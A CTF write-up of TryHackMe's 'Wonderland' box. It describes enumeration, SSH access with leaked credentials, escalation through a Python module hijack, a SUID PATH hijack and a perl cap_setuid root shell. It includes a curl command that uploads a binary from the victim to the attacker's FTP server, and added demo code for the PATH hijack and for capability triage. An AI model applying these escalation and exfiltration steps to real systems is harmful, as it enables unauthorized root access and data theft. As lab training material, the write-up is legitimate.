Wonderland CTF from TryHackMe!

Efrensagun
5 min read · Nov 12, 2020

This CTF is worth a write-up, as it was a bit of a challenge for me.

1. Scanning. As always, I start by scanning the target machine with Nmap.

2. Enumeration. I like to run dirb and dirbuster to enumerate available directories.

  • From the enumeration results, both dirb and dirbuster report directories such as /img, /r and /r/a.
  • /img directory:
  • Checking /r and /r/a, each page just tells us to keep going, which leaves us guessing which way to go. Analysing all the available images and directory contents, this one stands out:
  • Following the path /r/a/b/b/i/t:
  • Examining the page source reveals what appears to be a user's credentials.
  • These credentials can be used to log in over SSH, which the earlier Nmap scan showed was open.

3. Gaining Access. Now that we have a user's credentials, we can use them to gain access to the target system.

  • SWEET! We have gained access to the target machine.
  • Now we look around for interesting files that lead us to the flag.
  • We see root.txt, but it is owned by root:root and we have no permission to read it.
  • Running sudo -l shows the commands the user alice is allowed to run.
  • The result says: "User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py". This means we can run that Python command as the user rabbit.
  • So let's execute it: sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
  • Each time the command is run as rabbit, it prints a random stanza of a poem.
  • cat'ing walrus_and_the_carpenter.py shows that the script picks the stanza using Python's random module:
  • Since the script lives in /home/alice, a directory we own, and Python puts a script's own directory at the front of sys.path, we can drop a malicious random.py next to it that executes /bin/bash. The script's import random then loads our file instead of the standard-library module, and because the script runs under sudo as rabbit, we get a shell as rabbit.
  • SWEET! Now we have escalated to the rabbit user.
  • Navigating to /home/rabbit reveals a SUID binary; alternatively, search the whole filesystem with find / -perm -u=s -type f 2>/dev/null. One result stands out: teaParty.
  • This is what it looks like when executed:
  • It is a compiled binary rather than a script, so we need the strings command (or similar) to inspect its contents.
  • From my host machine I was running an FTP server (vsftpd).
  • Then, from the victim machine, I uploaded teaParty to my host so I could examine its contents with strings:

rabbit@wonderland:/home/rabbit$ curl -T ./teaParty ftp://10.x.x.x --user user:secret
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16816    0     0  100 16816      0   3191  0:00:05  0:00:05 --:--:--  3793

  • The strings output shows that the binary runs the date command by bare name rather than by absolute path. A command name without a slash is resolved by searching the directories in $PATH in order, so this can be abused by prepending a directory we control to PATH and writing a small script named date there.
  • The real binary is /bin/date; our own date goes in /tmp and we export PATH=/tmp:$PATH.
  • Now the lookup checks /tmp first, so any command run without an absolute path, such as date, resolves to the script we created. /tmp is a good candidate because it is world-writable (mode 1777 with the sticky bit), so any user can create a file there. Because teaParty is SUID, our date runs with the effective privileges of the file's owner.
  • Now we have escalated to the hatter user. Next, look around for interesting files, starting with /home/hatter.
  • With the password revealed there, we can SSH in as hatter:
  • Next I needed to escalate further. This time I used linpeas.sh (Linux Privilege Escalation Awesome Script) to enumerate possible escalation paths.
  • To get the script onto the target, I ran a simple Python HTTP server on my attacker machine and downloaded the file from the target.
  • One of the interesting results is below: a binary with the Linux CAP_SETUID file capability. If a binary has CAP_SETUID set, or is executed by another binary with that capability, it can be used as a backdoor to maintain privileged access by changing its own process UID (to 0, root).
  • Then I executed the perl one-liner that uses that capability to switch to UID 0 and spawn a shell, gaining root access.
  • CTF SOLVED!!!
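The PATH hijack above, as an added example that is not part of the original write-up. A constructed shell script stands in for teaParty and calls date by bare name, exactly the mistake a system("date") call makes; a constructed fake date prints a marker where the write-up's script would launch a shell; a temporary directory plays the role of /tmp. A hardened variant of the stand-in resets PATH and calls /bin/date by absolute path, so the same hijack fails against it.

```python
import os
import stat
import subprocess
import tempfile

# Constructed stand-in for teaParty: calls `date` by bare name, the same
# mistake as system("date") in a compiled binary.
VULNERABLE_TEA_PARTY = "#!/bin/sh\necho 'Probably by now the tea is ready.'\ndate\n"

# Hardened variant: reset PATH to known directories and call date by absolute
# path, so the caller's environment cannot choose which program runs.
HARDENED_TEA_PARTY = (
    "#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\n"
    "echo 'Probably by now the tea is ready.'\n/bin/date\n"
)

# Constructed fake date. In the write-up this would launch a shell; here it
# prints a marker so the outcome can be checked.
FAKE_DATE = "#!/bin/sh\necho HIJACKED-DATE\n"


def _write_executable(path: str, body: str) -> None:
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)


def run_tea_party(hijack: bool, hardened: bool = False) -> str:
    """Run the stand-in binary and return its stdout. With hijack=True a fake
    `date` is placed in a directory that is prepended to PATH, mirroring
    `export PATH=/tmp:$PATH` in the write-up."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "teaParty")
        _write_executable(target, HARDENED_TEA_PARTY if hardened else VULNERABLE_TEA_PARTY)
        env = dict(os.environ)
        env.setdefault("PATH", "/usr/bin:/bin")
        if hijack:
            evil_dir = os.path.join(d, "evil")      # plays the role of /tmp
            os.mkdir(evil_dir)
            _write_executable(os.path.join(evil_dir, "date"), FAKE_DATE)
            env["PATH"] = evil_dir + os.pathsep + env["PATH"]
        return subprocess.run([target], env=env, capture_output=True, text=True).stdout


def hijacked(hijack: bool = True, hardened: bool = False) -> bool:
    """True when the fake date ran instead of /bin/date."""
    return "HIJACKED-DATE" in run_tea_party(hijack, hardened)


if __name__ == "__main__":
    print("vulnerable, PATH hijacked:", hijacked(True))           # True
    print("vulnerable, clean PATH:   ", hijacked(False))          # False
    print("hardened, PATH hijacked:  ", hijacked(True, True))     # False
```

For a real SUID target the fake date usually has to launch bash with -p (or sh), because bash drops an effective UID that differs from the real UID unless told not to.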
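The capability finding above is what linpeas surfaces from getcap -r / 2>/dev/null; here is an added example (not from the original write-up) of triaging that output by hand. It parses both output formats libcap prints (the older "path = caps+flags" and the newer "path caps=flags"), and flags only binaries whose dangerous capability is both permitted and effective (+ep): with a bare p the capability is only permitted, and a capability-unaware interpreter like perl cannot use it without raising it first. The sample output is constructed for the demo.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output. The first three lines
# use the older libcap format ("path = caps+flags"), the rest the newer one
# ("path caps=flags"); both occur on real systems.
SAMPLE_GETCAP = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/python3.8 cap_setuid=p
"""

# File capabilities that let a process become root or bypass file permissions.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}

_LINE = re.compile(r"^(?P<path>\S+)(?: =)? (?P<caps>[a-z0-9_,]+)[=+](?P<flags>[eip]+)$")


def parse_getcap(text: str):
    """Return a list of (path, {capabilities}, flags) tuples, skipping lines
    that do not look like getcap output."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            entries.append((m["path"], set(m["caps"].split(",")), m["flags"]))
    return entries


def dangerous_binaries(text: str):
    """Paths carrying a dangerous capability that is both permitted and
    effective, i.e. usable straight after exec without a capset() call."""
    return sorted(
        path for path, caps, flags in parse_getcap(text)
        if caps & DANGEROUS and "e" in flags and "p" in flags
    )


if __name__ == "__main__":
    for path, caps, flags in parse_getcap(SAMPLE_GETCAP):
        print(path, sorted(caps), flags)
    print("escalation candidates:", dangerous_binaries(SAMPLE_GETCAP))
    # escalation candidates: ['/usr/bin/perl', '/usr/bin/perl5.26.1']
```

cap_net_raw on ping or tcpdump is the normal, intended use of file capabilities and is not listed; cap_setuid+ep on an interpreter is the finding worth acting on, since the interpreter will run any code the caller gives it.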
